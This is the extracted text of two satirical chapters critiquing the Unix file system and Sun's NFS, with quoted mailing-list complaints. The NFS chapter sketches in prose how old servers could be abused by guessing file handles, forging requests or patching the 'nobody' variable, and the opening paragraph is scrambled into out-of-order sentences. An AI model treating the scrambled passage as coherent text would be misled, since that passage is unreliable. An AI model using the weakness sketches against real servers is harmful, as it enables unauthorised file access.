Instead. What happens when a file’s “type” (as indicated by its extension) and its magic number don’t agree? That depends on the particular program you happen to be running.ma. To make this easier. and so forth. and upon reboot the mail partition was hopelessly scrambled.us (Simson L. Only some files—shell scripts. I recall the episode well. even though they are technically not bags. The problem vanished when we purchased some more reliable disk hardware… No File Types To UFS and all Unix-derived file systems. as the mythology goes. Unix doesn’t store type information with each file. Garfinkel) Hi Simson. This makes it easy to burn your fingers when renaming files.UFS: The Root of All Evil 269 Good luck. The lack of file types has become so enshrined in Unix mythology and academic computer science in general that few people can imagine why they . (A bag’o’bytes.c” are C source files. Programs are free to interpret those bytes however they wish. To resolve this problem. but streams).o” files and executable programs—have magic numbers. He told us: Date: From: Subject: To: Mon. It was pretty ugly. though.edu (Bruce Walton) UNIX-HATERS simsong@next. on the other hand. 4 Oct 93 07:27:33 EDT bruce@ai. because nobody could trust that they were getting all their mail. The loader will just complain and exit.cambridge. I was a lab neophyte at the time. We spoke with the current system administrator at the MIT AI Lab about this problem. In fact it did happen more than once. “. Unix forces the user to encode this information in the file’s name! Files ending with a “. (I would rather forget!:-) ) Life would barf file system errors and panic. files ending with a “. some Unix files have “magic numbers” that are contained in the file’s first few bytes. might try starting up a copy of /bin/sh and giving your file to that shell as input.mit. The exec() family of kernel functions.o” are object files. We did write some scripts to grovel the To: addresses and try to assign uids to the files. files are nothing more than long sequences of bytes.
Some programs will notice the difference. these files must be processed from beginning to end whenever they are accessed. who have known and enjoyed file types since 1984. has no provision for storing a record length with a file. Ritchie thought that record locking wasn't something that an operating system should enforce—it was up to user programs. Maybe… All of Unix’s own internal databases—the password file. Indeed. not two. Doubling the number of users halves performance. Few people. by design. this depends on the program that you're using. Although this method is adequate when each database typically had less than 20 or 30 lines. Computers are like this. lest they figure out what you are really up to. In the early days. “Records” become lines that are terminated with line-feed characters. Again. File and Record Locking “Record locking” is not a way to keep the IRS away from your financial records. Typically. the Unix file system. too. but a technique for keeping them away during the moments that you are cooking them. Most won’t. The result? Instant bottleneck trying to read system databases. when Unix moved out into the “real world” people started trying to put hundreds or thousands of entries into these files. but three completely different systems for record locking. it does have provisions for record locking. No Record Lengths Despite the number of databases stored on Unix systems. many people are surprised that modern Unix has not one. and other critical databases. the group file.270 The File System might be useful. /etc/group. Unix didn’t have any record locking at all. The IRS is only allowed to see clean snapshots. Although Unix lacks direct record support. No less than four mutually incompatiable workarounds have now been developed to cache the information in /etc/password. This is why you need a fast computer to run Unix. the mail aliases file—are stored as text files. but each wants private access while the others are kept at bay. All have their failings. So when Unix . A real system wouldn’t be bothered by the addition of new users. Two or more users want access to the same records. and won’t know the difference. We’re talking real slowdown here. Locking violated the “live free and die” spirit of this conceptionally clean operating system. that is. storing and maintaining record lengths is left to the programmer. This means that you can have one program that stores a file with 100-byte records. and you can read it back with a program that expects 200-byte records. What if you get it wrong? Again. except for Macintosh users.
Other programs seeking to modify the losers file at the same time would not be able to create the file losers.” and it is constantly being fought over. To quote from the flock(2) man page (we’re not making this up): Advisory locks allow cooperating processes to perform consistent operations on files. but do not guarantee consistency (i. If the program succeed in creating the file. In this case.e. whose basic premise is that creating a file is an atomic operation. and the lock file is deleted.UFS: The Root of All Evil 271 hackers finally realized that lock files had to be made and maintained. When a program finds the lock file. A more severe problem occurred when the system (or the program creating the lock file) crashed because the lock file would outlive the process that created it and the file would remain forever locked.. Berkeley came up with the concept of advisory locks. An atomic operation is guaranteed to complete without your stupid kid brother grabbing the CPU out from under you. a file can’t be created when one is already there. it would assume that it had the lock and could go and play with the losers file. the toy is called the “CPU.lck. When it was done. Unix has a jury-rigged solution called the lock file. it would delete the file losers. These are operations that cannot be interrupted midstream.lck. similar to an airline attempting to find the luggage’s owner by driving up and down the streets of the disembarkation point. Another kludge. When a program wants to make a change to a critical database called losers. it searches the process table for the process that created the lock file. it means that the process died. .” You need an “atomic operation” to build a locking system. This “solution” had an immediate drawback: processes wasted CPU time by attempting over and over again to create locks. The trick is to not give up the CPU at embarrassing moments. Programs under Unix are like siblings fighting over a toy. they came up with the “lock file. After a while of losing with this approach. The program then tries again to obtain the lock. they would execute a sleep call—and wait for a few seconds—and try again. the program would first create a lock file called losers. If the process isn’t found. processes may still access files without using advisory locks possibly resulting in inconsistencies).lck. Instead. another reason Unix runs so slowly. The solution that was hacked up stored the process ID of the lock-making process inside the lock file. similar to an airline passenger putting name tags on her luggage.
Instead of having no locking mechanism. meanwhile. and many are the flames we have shared about The World’s Worst Operating System (Unix. One of his favorite hating points was the [alleged] lack of file locking. unaware of their problems. where record locking was required. both are so unrelated that they know nothing of the other’s existence. 17 May 90 22:07:20 PDT Michael Tiemann <cygint!tiemann@labrea.272 The File System AT&T. Michael This doesn’t mean. losing files. Date: From: To: Subject: Thu. needing to run fsck on every reboot… the minor inconveniences Unix weenies suffer with the zeal of monks engaging in mutual flagellation. lock files have such a strong history with Unix that many programmers today are using them. he is trying to fix some code that runs under Unix (who would notice?). one never had to worry about losing mail. such as the current implementation of UUCP and cu. Furthermore. But the piece de resistance is that a THIRD system call is needed to tell which of the two locking mechanisms (or both!) are in effect. It came up with the idea of mandatory record locking. for you Unix weenies). bloated kernel. was trying to sell Unix into the corporate market. so good—until SVR4. For reasons I’d rather not mention. Dependence on lock files is built into many modern Unix utilities. Years of nitrous and the Grateful Dead seemed to have little effect on his mind compared with the shock of finding that Unix does not lack locks. IT HAS TWO!! Of course. when Sun and AT&T had to merge the two different approaches into a single. . of course. We have been friends for years. that you won’t find lock files on your Unix system today. So far.edu> UNIX-HATERS New Unix brain damage discovered I’m sitting next to yet another victim of Unix. He was always going on about how under real operating systems (ITS and MULTICS among others).stanford.
the operating system demands perfection from the hardware upon which it runs. (You would be surprised how often this happens. Unix File System Error Messages. The requirement for a perfect disk pack is most plainly evident in the last two of these panic messages. performs an operation on it (such as decreasing a num- .) The dictionary defines panic as “a sudden overpowering fright. A directory file is smaller than the minimum directory size. UFS reads a block of data from the disk. Then again. trashing your file system in the process. especially a sudden unreasoning terror often accompanied by mass flight. becuase most SCSI hard disks do know how to detect and map out blocks as the blocks begin to fail. (Few people see this behavior nowadays. or something like that. dev = 0xXX. though.UFS: The Root of All Evil 273 Only the Most Perfect Disk Pack Need Apply One common problem with Unix is perfection: while offering none of its own. Message panic: fsfull panic: fssleep panic: alloccgblk: cyl groups corrupted panic: DIRBLKSIZ > fsize Meaning The file system is full (a write failed). fssleep() was called for no apparent reason. maybe you wouldn’t. until they trip and panic. but Unix doesn’t know why. In both of these cases. That’s because Unix programs usually don’t check for hardware errors—they just blindly stumble along when things begin to fail. fs = ufs panic: free_block: freeing free block panic: direnter: target directory link count FIGURE 4. Unix tried to free a block that was already on the free list. We’ve put a list of some of the more informative(?) ones in Figure 4.” That’s a pretty good description of a Unix panic: the computer prints the word “panic” on the system console and halts. Unix couldn’t determine the requested disk cylinder from the block number.) Unix accidentally lowered the link count on a directory to zero or a negative number. block = NN.
easy-to-understand filenames like these: 1992 Sales Report Personnel File: Verne. (Some versions will even let you build files that have no name at all. (After all. which allows filenames longer than 14 characters. anyway?) In recent years. what are sysadmins paid for. the Unix file system has appeared slightly more tolerant of disk woes simply because modern disk drives contain controllers that present the illusion of a perfect hard disk. and obtains a nonsensical value. . “You can’t fake what you don’t have. That’s right: you can literally create files with names that other people can’t access. only rt005mfkbgkw0. However. What to do? Unix could abort the operation (returning an error to the user). don’t fret: Unix will let you construct filenames that have control characters or graphics symbols in them.cp Unfortunately. set.) But.” Sooner or later. the rest of Unix isn’t as tolerant. Unix never knows what happened. Others don’t.274 The File System ber stored in a structure). easiest way out: it gives up the ghost and forces you to put things back together later. It sort of makes up for the lack of serious security access controls in the rest of Unix.cp will work with the majority of Unix utilities (which generally can’t tolerate spaces in filenames).) This can be a great security feature— especially if you have control keys on your keyboard that other people don’t have on theirs. Unix could even try to “fix” the value (such as doing something that makes sense). (Some versions of Unix allow ASCII characters with the high-bit. as Seymour Cray used to say. bit 8. Unix takes the fourth. Of the filenames shown above. the disk goes bad. when a modern SCSI hard disk controller detects a block going bad. Unix could declare the device “bad” and unmount it. and then the beauty of UFS shows through. (Indeed.) This feature is great—especially in versions of Unix based on Berkeley’s Fast File System. It means that you are free to construct informative. it copies the data to another block elsewhere on the disk and then rewrites a mapping table. Jules rt005mfkbgkw0. Don’t Touch That Slash! UFS allows any character in a filename except for the slash (/) and the ASCII NUL character.
com (Steve Sekiguchi) Subject: Info-Mac Digest V8 #35 I’ve got a rather difficult problem here. All of this works great! Now here is the problem. hardly ever. since the Unix kernel uses the slash to denote subdirectories. Does anyone have a suggestion for getting the files off the backup tape? Thanks in Advance.com Wind River Systems Emeryville CA. “restore” core dumps when it runs into a file with a “/” in the filename. This is great until you try to restore one of these files from your “dump” tapes. . We’re surprised that the files got written to the dump tape at all.) Never? Well. ever send a filename that had a slash inside it and thus didn’t bother to check for the illegal character. We use this to hook up Macs and Suns. which does list on some versions of Unix as a slash character. As far as I can tell the “dump” tape is fine. steve@wrs. ever contain the magic slash character (/). is there now?) 5 Forwarded to UNIX-HATERS by Steve Strassmann. Steven Sekiguchi sun!wrs!steve. There’s really no way to tell for sure. perhaps they didn’t. 94608 Apparently Sun’s circa 1990 NFS server (which runs inside the kernel) assumed that an NFS client would never. (Then again. Macs are allowed to create files on the Sun/ Unix fileserver with a “/” in the filename. We've got a Gator Box running the NFS/AFP conversion.UFS: The Root of All Evil 275 Recall that Unix does place one hard-and-fast restriction on filenames: they may never.dec. To enforce this requirement. Date: Mon. (However. With the Sun as a AppleShare File server. 8 Jan 90 18:41:57 PST From: sun!wrs!yuba!steve@decwrl. the Unix kernel simply will never let you create a filename that has a slash in it. you can have a filename with the 0200 bit set.
And then I remembered this horror from further down in the cp(1) man page: BUGS cp(1) copies the contents of files pointed to by symbolic links. Date: From: To: Subject: Mon. for more than a decade.276 The File System Moving Your Directories Historically. Hmm… Sure did seem to be taking a long time. Indeed. and I found the following on the man page for the cp(1) command: NAME cp . authors. the destination must be a directory. considering that Unix (falsely) prides itself on having invented the hierarchical file system. the standard way to move directories around was with the cp command.edu> UNIX-HATERS what else? Ever want to copy an entire file hierarchy to a new location? I wanted to do this recently. Unix provides no tools for maintaining recursive directories of files. But cp can blow up in your face. Although some versions of Unix now have a mvdir command. for years. This is rather surprising. If any of the source files are directories. This can lead to . For example.mit. Unix lacked a standard program for moving a directory from one device (or partition) to another. right? (At this point half my audience should already be screaming in agony—“NO! DON’T OPEN THAT DOOR! THAT’S WHERE THE ALIEN IS HIDING!”) So I went ahead and typed the command. It does not copy the symbolic link itself. or other file attributes). … Sounds like just what I wanted. copy the directory along with its files (including any subdirectories and their files).copy files … cp -rR [ -ip ] directory1 directory2 … -r -R Recursive. 14 Sep 92 23:46:03 EDT Alan Bawden <Alan@lcs. many people still use cp for this purpose (even though the program doesn’t preserve modification dates.
Imagine all of the wasted disk space on the millions of Unix systems throughout the world. The solution. it’s just spare change. as any well-seasoned Unix veteran will tell you. even though it kills performance.000. it is one of the “standard” Unix programs for making a tape backup of the information on a hard disk. There is a twist if you happen to be the superuser—or a daemon running as root (which is usually the case anyway). Why think when you can just buy bigger disks? It is estimated that there are 100. Push disk usage much past 90%. In this case. and you’ll grind your computer to a halt. is to use tar6 if you want to copy a hierarchy.000.000 bytes of wasted disk space in the world due to Unix. But for Unix. The Unix solution takes a page from any good politician and fakes the numbers. the disk will be at “105% capacity. . 100MB is a large amount of space for a PC-class computer. No kidding. Filenames that were linked in the original hierarchy are no longer linked in the replica… This is actually rather an understatement of the true magnitude of the bug. Unix’s df command is rigged so that a disk that is 90% filled gets reported as “100%. You could probably fit a copy of a better operating system into the wasted disk space of every Unix system. So you might have 100MB free on your 1000MB disk. The problem is not just one of “inconsistencies”—in point of fact the copy may be infinitely large if there is any circularity in the symbolic links in the source hierarchy. So when you have that disk with 100MB free and the superuser tries to put out 50MB of new files on the disk. raising it to 950 MB.000. right? Disk Usage at 110%? The Unix file system slows down as the disk fills up. and so forth.” 80% gets reported as being “91%” full. Unix goes ahead and lets you write out files. but if you try to save a file.” 6 “tar” stands for tape archiver.UFS: The Root of All Evil 277 inconsistencies when directory hierarchies are replicated. Early versions wouldn’t write backups that were more than one tape long. Simple and elegant. Unix will say that the file system is full.
Foner) UNIX-HATERS Geez… I just love how an operating system that is really a thinly disguised veneer over a file system can’t quite manage to keep even its file system substrate functioning. They wish to believe that the Unix file system is just about the fastest. it just slowly gets harder and harder to store anything at all… I’ve seen about 10 messages from people on a variety of Suns today. if a file could be opened. Whether you are running the original UFS or the new and improved FFS. all complaining about massive file system lossage. I’m particularly enthralled with the idea that. Lenny Foner explains it like this: Date: From: To: Subject: Mon. The assumption is that.edu (Leonard N. highest-performance file system that’s ever been written. I guess this is kinda like “soft clipping” in an audio amplifier: rather than have the amount of useful data you can store suddenly hit a wall.mit. they’re wrong. Sadly. 13 Nov 89 23:20:51 EST foner@ai.278 The File System Weird. then all of the bytes it contains can be written. . and why the shell commands coming out of the files correspond to data that used to be in other files but aren’t actually in the files that ‘mv’ is touching anyway… Performance So why bother with all this? Unix weenies have a single answer to this question: performance. it trashes more and more data. Don’t Forget to write(2) Most Unix utilities don’t check the result code from the write(2) system call—they just assume that there is enough space left on the device and keep blindly writing. This must be closely related to why ‘mv’ and other things right now are trying to read shell commands out of files instead of actually moving the files themselves. as the file system gets fuller. huh? It’s sort of like someone who sets his watch five minutes ahead and then arrives five minutes late to all of his appointments. the Unix file system has a number of design flaws that prevent it from ever achieving high performance. because he knows that his watch is running fast.
FFS. and files with their contents spread across the horizion—places an ultimate limit on how efficient any POSIX-compliant file system can ever be. from an announcement of a recent talk here: …We have implemented a prototype log-structured file system called Sprite LFS.com> How do you spell “efficient?” UNIX-HATERS Consider that Unix was built on the idea of processing files. they’ll likely stay in the research lab. Researchers experimenting with Sprite and other file systems report performance that is 50% to 80% faster than UFS. whereas Unix file systems typically can use only 5-10%. . Then consider this. Consider that Unix weenies spend an inordinate amount of time micro-optimizing code.UFS: The Root of All Evil 279 Unfortunately. —smL So why do people believe that the Unix file system is high performance? Because Berkeley named their file system “The Fast File System. the whole underlying design of the Unix file system—directories that are virtually content free. it was faster than the original file system that Thompson and Ritchie had written.” Well. 7 May 1991 10:22:23 PDT Stanley’s Tool Works <lanning@parc. Because these file systems don’t. Even when the overhead for cleaning is included.xerox. or any other file system that implements the Unix standard. Date: From: Subject: To: Tue. Consider how they rant and rave at the mere mention of inefficient tools like a garbage collector. it outperforms current Unix file systems by an order of magnitude for small-file writes while matching or exceeding Unix performance for reads and large writes. Sprite LFS can use 70% of the disk bandwidth for writing. inodes that lack filenames.
282 .
Sun Microsystems developed a system for letting computers share files over a network. central location—the network file server—and access those files from anywhere on the local network. When disks became cheap enough. or perhaps Nightmare. —Henry Spencer In the mid-1980s. Called the Network File System—or. NFS let Sun sell bargain-basement “diskless” workstations that stored files on larger “file servers. NFS has evolved an elaborate mythology of its own: 1 Bet you didn’t know that Xerox holds the patent on Ethernet.” all made possible through the magic of Xerox’s1 Ethernet technology.14 NFS Nightmare File System The “N” in NFS stands for Not. NFS—this system was largely responsible for Sun’s success as a computer manufacturer. more often. did you? . Today the price of mass storage has dropped dramatically. NFS still found favor because it made it easy for users to share files. or Need. yet NFS still enjoys popularity: it lets people store their personal files in a single.
• NFS users never need to log onto the server. you need the magic cookie for the remote file system's root directory. Remote disks are automatically mounted as necessary. Several companies now offer NFS clients for such microcomputers as the IBM PC and Apple Macintosh. and it sends you back a magic cookie for that directory.284 NFS • NFS file servers simplify network management because only one computer need be regularly written to backup tape. and indeed never tested on a non-Unix system until several years after its initial release. . considering that it was designed by Unix systems programmers. To read a file. you send the server the directory's magic cookie. The server sends you back a list of the files that are in the remote directory. Send the file server’s mount daemon the name of the directory that you want to mount. workstations can be set to mount the disks on the server automatically at boot time. The network fades away and a dozen or a hundred individual workstations look to the user like one big happy time-sharing machine. • NFS is “operating system independent. Likewise. the workstation alone suffices. Not Fully Serviceable NFS is based on the concept of the “magic cookie. But practice rarely agrees with theory when the Nightmare File System is at work. to read the contents of a directory. Nevertheless.” This is all the more remarkable.” Every file and every directory on the file server is represented by a magic cookie. apparently proving this claim. Alternatively. you send the file server a packet containing the file’s magic cookie and the range of bytes that you want to read. To start this whole process off. • NFS lets “client computers” mount the disks on the server as if they were physically connected to themselves. and files are accessed transparently. NFS uses a separate protocol for this called MOUNT. as well as a magic cookie for each of the files that the remote directory contains. The file server sends you back a packet with the bytes. developed for Unix. it is testimony to the wisdom of the programmers at Sun Microsystems that the NFS protocol has nothing in it that is Unix-specific: any computer can be an NFS server or client.
Rather than fundamentally redesign NFS. You can only delete a file once. Sun has discovered many cases in which the NFS breaks down. NFS uses the Internet UDP protocol to transmit information between the client and the server. Let’s see how the NFS model breaks down in some common cases: . as long as the file continues to exist and no major changes are made to the configuration of the server. Sun would have us believe that the advantage of a connectionless.” That’s because UDP doesn’t guarantee that your packets will get delivered.Not Fully Serviceable 285 By design. the NFS client simply waits for a few milliseconds and then resends its request. Once a magic cookie is issued for a file. stateless system: it doesn’t work. this was only an advantage for Sun’s engineers. you’ll see lots of hacks and kludges—all designed to impose state on a stateless protocol. by their very nature. if you look inside the NFS code. instead of having additional information stored on the server. In fact. “Connectionless” means that the server program does not keep connections for each client. Instead. NFS is connectionless and stateless. it is neither. File systems. have state. that file handle will remain good even if the server is shut down and rebooted. In practice. when both kinds of crashes were frequent occurrences. That was important in Sun’s early days. “Stateless” means that all of the information that the client needs to mount a remote file system is kept on the client. stateless system is that clients can continue using a network file server even if that server crashes and restarts because there is no connection that must be reestablished. That’s why. People who know about network protocols realize that the initials UDP stand for “Unreliable Datagram Protocol. Broken Cookie Over the years. and then it’s gone. But no matter: if an answer to a request isn’t received. and all of the state information associated with the remote mount is kept on the client. There’s only one problem with a connectionless. This conflict between design and implementation is at the root of most NFS problems. all Sun has done is hacked upon it. who didn’t have to write additional code to handle server and client crashes and restarts gracefully.
NFS Hack Solution #1: Sun invented a network lock protocol and a lock daemon. rather than patiently putting them into a queue and waiting for the reply. Eventually. an elaborate restart procedure after the crash is necessary to recover state. where it is rarely tested and can only benefit locks. the file’s name is removed from its directory. thoroughly debugged. Why the hack doesn’t work: Locks can be lost if the server crashes. NFS Hack Solution #2: When the NFS client doesn’t get a response from the server.286 NFS • Example #1: NFS is stateless. but the disk blocks associated with the file are not deleted until the file is closed. and so on. Delays accumulate. then drags. This gross hack allows programs to create temporary files that can’t be accessed by other programs. lockd. • Example #2: NFS is based on UDP. it backs off for twice as long. tuning isn’t done. and made available to all programs. If it doesn't get a second answer. but many programs designed for Unix systems require record locking in order to guarantee database consistency. all of the other clients who want file service will continue to hammer away at the server with duplicate and triplicate NFS requests. it could have been put into the main protocol. each network. As a result. More often than not. Deciding which method is the grosser of the two . Of course. Then four times as long. • Example #3: If you delete a file in Unix that is still open. the original reason for making NFS stateless in the first place was to avoid the need for such restart procedures. if a client request isn’t answered. If the server is doing something time-consuming for one client. This network locking system has all of the state and associated problems with state that NFS was designed to avoid. the client resends the request until it gets an answer. it backs off and pauses for a few milliseconds before it asks a second time. Performance lags. thinking that throwing money at the problem will make it go away. Why the hack doesn’t work: The problem is that this strategy has to be tuned for each individual NFS server. Instead of hiding this complexity in the lockd program. (This is the second way that Unix uses to create temporary files. the other technique is to use the mktmp() function and create a temporary file in the /tmp directory that has the process ID in the filename. the sysadmin complains and the company buys a faster LAN or leased line or network concentrator.
the server lets you play with it to your heart’s content. NFS Hack Solution #3: When an NFS client deletes a file that is open. the dot-file never gets deleted.m. or even forge a letter of resignation from you to put in your boss’s mailbox. NFS servers have to run nightly “clean-up” shell scripts that search for all of the files with names like “. Go ahead. the client sends through the Delete-File command to delete the NFS dot-file.nfs0003234320” that are more than a few days old and automatically delete them. Fact is. When the file is closed on the client. You better be sure that your network file system has some built-in security to prevent these sorts of attacks. No File Security Putting your computer on the network means potentially giving every pimply faced ten-year-old computer cracker in the world the ability to read your love letters. it really renames the file with a crazy name like “.No File Security 287 is an exercise left to the reader. And you better not go on vacation with the mail(1) program still running if you want your mail file to be around when you return. This is why most Unix systems suddenly freeze up at 2:00 a.) But this hack doesn’t work over NFS. (No kidding!) So even though NFS builds its reputation on being a “stateless” file system. If you give an NFS file server a valid handle for a file. And every single gross hack that’s become part of the NFS “standard” is an attempt to cover up that lie. because it begins with a leading period. As a result. gloss it over. The server is filled with state—a whole disk worth. Unfortunately. scribble away: the server doesn’t even have the ability to log the network address of the workstation that does the damage.nfs0003234320” which. . does not appear in normal file listings. It’s only the NFS protocol that is stateless. insert spurious commas into your source code. Every single process on the client has state. it's gone. Why the hack doesn’t work: If the client crashes. NFS wasn’t designed for security. The stateless protocol doesn't know that the file is “opened” — as soon as the file is deleted. each morning—they’re spinning their disks running find. and try to make it seem that it isn’t so bad. it’s all a big lie. the protocol doesn’t have any.
Now it is time to pack up and go home. but everything seems to be working fine now. The Grand Exalted Wizard told me I was all set: from now on whenever I logged in I would automatically be granted the appropriate network privileges. Case in point: When I started using the Unix boxes at LCS I found that I didn’t have access to modify remote files through NFS. But I don’t have to find a Unix weenie because as part of getting set up in the Kerberos database they did warn me that my Kerberos privileges would expire in eight hours. So I run kinit and type in my name and password again. OK. Back to the Unix-knowledgeable to find out. but hangs around in the background until you log out. it didn’t work. So I did so. So the first time I tried it out. you have to be running the nfsauth program. 31 Jan 91 12:49:31 EST Alan Bawden <alan@ai. so I try to write my files back out over the network.edu> UNIX-HATERS Wizards and Kerberos Isn’t it great how when you go to a Unix weenie for advice. we forgot to mention that in order to take advantage of your Kerberos privileges to use NFS. Knowledgeable people informed me that I had to visit a Grand Exalted Wizard who would add my name and password to the “Kerberos” database. Eight hours pass. They even mentioned that I could run the kinit program to renew them. so I edit my . . so I get back to work. Oh yeah. as Alan Bawden found out: Date: From: To: Subject: Thu. Goddamn.mit.288 NFS MIT’s Project Athena attempted to add security to NFS using a network security system called Kerberos. Another weird thing is that nfsauth doesn’t just run once. The consequences of all this aren’t immediately obvious. Apparently it has to renew some permission or other every few minutes or so. Permission denied.login to run nfsauth. True to its name. the hybrid system is a real dog. I am briefly annoyed that nfsauth requires me to list the names of all the NFS servers I am planning on using. he never tells you everything you need to know? Instead you have to return to him several times so that he can demand-page in the necessary information driven by the faults you are forced to take.
Well. you need to mount the file system. so this becomes a bit of a routine. can’t do that. To get the magic cookie for the root directory of a file system. so its creators gave it the appearance of security. Recall that if you don’t give the NFS server a magic cookie. though.No File Security 289 But Unix still doesn’t let me write my files back out. nothing prevents a rogue program from guessing magic cookies. Unfortunately. In a typical firewall-protected network environment. In practice. NFS’s big security risk isn’t the risk of attack by outsiders—it’s the risk that insiders with authorized access to your file server can use that access to get at your files as well as their own. by controlling access to the cookies. Not being in an NFS server’s exports file raises the time to break into a server from a few seconds to a few hours. you’ve logged into your workstation. once again feeding it the names of all the NFS servers I am using. once a cookie is guessed (or legitimately obtained) it’s good forever. it turns out that I almost always work for longer than eight hours. so I start up another nfsauth. the NFS server has no concept of “logging in. A special file on the server called /etc/exports lists the exported file systems and the computers to which the file systems are allowed to be exported. So. you can’t scribble on the file. OK. but the NFS server doesn’t . since the servers are stateless. Now I can write my files back out. I poke around a bit and find that the problem is that when your Kerberos privileges expire. Well. And. the NFS theory goes. And that’s where the idea of “security” comes in. Since it is stateless. I ask. how about at least fixing nfsauth so that instead of crashing. Not much more. these guesses aren’t very hard to make. It seems that nobody can locate the sources to nfsauth. it just hangs around and waits for your new Kerberos privileges to arrive? Sorry.” Oh sure. The Exports List NFS couldn’t have been marketed if it looked like the system offered no security. My fellow victims in LCS Unix land assure me that this really is the way it works and that they all just put up with it. nfsauth crashes. you control access to the files. without going through the formality of implementing a secure protocol.
If you want to modify a file on the server that is owned by root and the file is read-only. asking it to read or write a file. This is partly because Unix doesn't have one either. Because forging packets is so simple..290 NFS know that. Unfortunately. you patch the server’s operating system to eliminate security. you must log onto the server—unless. The nice thing about NFS is that when you compromise the workstation. .edu> UNIX-HATERS Computational Cosmology. Don’t want to go through the hassle of booting the workstation in singleuser mode? No problem! You can run user-level programs that send requests to an NFS server—and access anybody’s files—just by typing in a 500-line C program or getting a copy from the net archives. If you are logged in as superuser. which has no privileges. The problem is that networks make things polytheistic: Should my workstation’s God be able to turn your workstation into a pillar of salt? Well gee. Horswill” <ian@ai. Sun has this spiffy network file system. So whenever you send a magic cookie to the NFS server. Any requests for superuser on the network are automatically mapped to the “nobody” user. many NFS servers are configured to prevent superuser across the network. it doesn’t have any real theory of access control. there is no easy way for you to regain your privilege—no program you can run.e. Want to read George’s files? Just change your UID to be George’s. of course. it’s trivial to put most workstations into single-user mode. and the Theology of Unix It works like this. no password you can type.mit. root) can do anything. It has two levels: mortal and God. Ian Horswill summed it all up in December 1990 in response to a question posed by a person who was trying to run the SUID mail delivery program /bin/mail on one computer but have the mail files in /usr/ spool/mail on another computer. you’ve compromised the server as well. This is a deep and important theological question that has puzzled humankind for millennia. that depends on whether my God and your God are on good terms or maybe are really just the SAME God. God (i. the superuser has fewer privileges on NFS workstations than non-superuser users have. Because of this situation. But there’s more. After all. and read away. you also tell the server your user number. 7 Dec 90 12:48:50 EST “Ian D. Date: From: To: Subject: Fri. mounted via NFS.
rather than to 0. the binary representation of God (*). -ian ————————————————————— (*) That God has a binary representation is just another clear indication that Unix is extremely cabalistic and was probably written by disciples of Aleister Crowley. knowing that it is. Today we are stuck with it. attempts to create a mailbox on a remote server on a monotheistic Unix. thus establishing the protocol as an unchangeable standard. . binmail.” When network file requests come in from root (i. it’s also true that none of them work well. by using adb to set the kernel variable “nobody” to 0 in the divine boot image. God). in fact. you can move to a Ba’hai cosmology in which all Gods are really manifestations of the One Root God.e. Although it is true that NFS servers and clients have been written for microcomputers like DOS PCs and Macintoshes. Not File System Specific? (Not Quite) The NFS designers thought that they were designing a networked file system that could work with computers running operating systems other than Unix. the divine binmail isn’t divine so your mail file gets created by “nobody” and when binmail invokes the divine change-owner command. Unfortunately. it will be able to invoke the divine change-owner command so as to make it profane enough for you to touch it without spontaneously combusting and having your eternal soul damned to hell. However. The default corresponds to a basically Greek pantheon in which there are many Gods and they’re all trying to screw each other (both literally and figuratively in the Greek case). So. and work with file systems other than the Unix file system. thus inventing monotheism. it maps them to be requests from the value of the kernel variable “nobody” which as distributed is set to -1 which by convention corresponds to no user whatsoever. patch the kernel on the file server or run sendmail on the server. infallible. Thus when the manifestation of the divine spirit. it is returned an error code which it forgets to check.. they didn’t try to verify this belief before they shipped their initial implementation. It contains a polytheism bit called “nobody.Not File System Specific? (Not Quite) 291 The Sun kernel has a user-patchable cosmology. Zero. On a polytheistic Unix.
this aspect of the protocol was announced long before even a single non-UNIX implementation was done. There never will be a good Macintosh NFS product without major changes to the NFS protocol. The supposedly inter-OS nature of NFS is a fabrication (albeit a sincere one) of starry-eyed Sun engineers. It works very well between Unix systems. but the fact is that NFS is not well suited to inter-operating-system environments.comp.mac2 It may be of interest to some people that TOPS. a Sun Microsystems company. and to replace its current product TOPS with this Macintosh NFS. TOPS did negotiate with Sun over changes in the NFS protocol that would allow efficient operation with the Macintosh file system. these negotiations came to naught because of blocking on the Sun side. Tim Maroney.com Virtual File Corruption What’s better than a networked file system that corrupts your files? A file system that doesn’t really corrupt them. It does not work well when there is a complex file system like Macintosh or VMS involved. but only makes them appear as if they are corrupted. It can be made to work.” . Those changes will not happen. I don’t mean to sound like a broken record here. 2 Forwarded to UNIX-HATERS by Richard Mlynarik with the comment “Many people (but not Famous Net Personalities) have known this for years.uucp (Tim Maroney) Subject: Re: NFS and Mac IIs Newsgroups: comp. Mac Software Consultant. but only with a great deal of difficulty and a very user-visible performance penalty.sys.nfs. There are simply too many technical obstacles to producing a good NFS client or server that is compatible with the Macintosh file system. tim@toad. The efficiency constraints imposed by the RPC model are one major problem. the lack of flexibility of the NFS protocol is another.protocols. Last year. However. was slated from the time of the acquisition by Sun to produce a Macintosh NFS. this attempt was abandoned. NFS does this from time to time.292 NFS Date: 19 Jul 89 19:51:45 GMT From: tim@hoptoad. tolerably well between Unix and the similarly ultra-simple MS-DOS file system.
If these things don’t work or if you have some questions. REMEMBER. when. you see a different prompt or get an error message to the effect that you have no login files/ directory.edu As most of you know. 5 Jan 90 14:01:05 EST curt@ai. This bug makes it appear that NFS mounted files have been trashed. try the steps I’ve recommended. We should have a fix soon. It may also affect your . If you discover that your files are trashed locally. but until Sun gets us a fix. but it looks bad.edu (Curtis Fennell)3 Re: NFS Problems all-ai@ai. You may accidentally trash the good files on the server. in fact. —Curt 3 Forwarded to UNIX-HATERS by David Chapman. Your original file probably is still OK.mit. . it does not actually trash your files. all you have to do is to log out locally and try again. The symptoms of this problem are: When you go to log in or to access a file. We have taken the recommended steps to correct this problem. DO NOT try to remove or erase the trashed files locally.login file(s) so that when you log in. we have been having problems with NFS because of a bug in the operating system on the Suns. it looks as though the file is garbage or is a completely different file. feel free to ask me for help anytime. If this happens to you. Things should be OK after you’ve logged in again.Not File System Specific? (Not Quite) 293 Date: From: Subject: To: Fri. You can do this by logging directly into the server that your files are on and looking at the files. they are OK.mit. this problem only makes it appear as if your files have been trashed. but not on the server. it will reoccur occasionally. This is because the system has loaded an incorrect file pointer across the net. the first thing to do is to check the file on the server to see if is OK on the server. in the meantime.
